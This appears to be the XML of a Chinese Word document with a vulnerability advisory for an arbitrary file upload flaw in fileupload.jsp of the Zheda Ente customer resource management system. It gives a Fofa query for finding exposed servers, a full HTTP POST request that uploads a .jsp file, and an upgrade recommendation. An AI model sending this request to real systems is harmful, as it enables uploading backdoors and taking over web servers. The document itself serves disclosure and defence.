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浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>浙大恩特客户资源管理系统是恩特软件开发的一款客户资源管理系统。浙大恩特客户资源管理系统 fileupload.jsp 存在任意文件上传漏洞。攻击者可通过该漏洞在服务器端上传后门，执行代码，获取服务器权限，进而控制整个 web 服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Fofa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>title="欢迎使用浙大恩特客户资源管理系统"</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93055" cy="2224405"/>
            <wp:effectExtent l="0" t="0" r="190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93055" cy="222440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部分界面如下</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55590" cy="2628265"/>
            <wp:effectExtent l="0" t="0" r="889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55590" cy="2628265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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隐患URL</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POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=123123.jsp HTTP/1.1</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Host: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Cache-Control: max-age=0</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Upgrade-Insecure-Requests: 1</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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36</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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</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Accept-Encoding: gzip, deflate</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Accept-Language: zh-CN,zh;q=0.9</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Cookie: JSESSIONID=2511BA8347F6BD511B037A4B0C40DDE3; JSESSIONID=17BAFD608E509D1C96AF5715B9C0C235</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Connection: close</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Content-Type: application/x-www-form-urlencoded</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Content-Length: 4</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test</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64150" cy="2616200"/>
            <wp:effectExtent l="0" t="0" r="889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4150" cy="261620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访问如下</w:t>
      </w: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322570" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="1143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322570" cy="267271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修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1、升级到安全版本。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82CCE9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5D82CCE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1AE1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2023-11-07T15:51:36Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-07T15:53:57Z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D16BA83740AE4B6E8C0F4BEAF5929D07_12</vt:lpwstr>
  </property>
</Properties>
</file>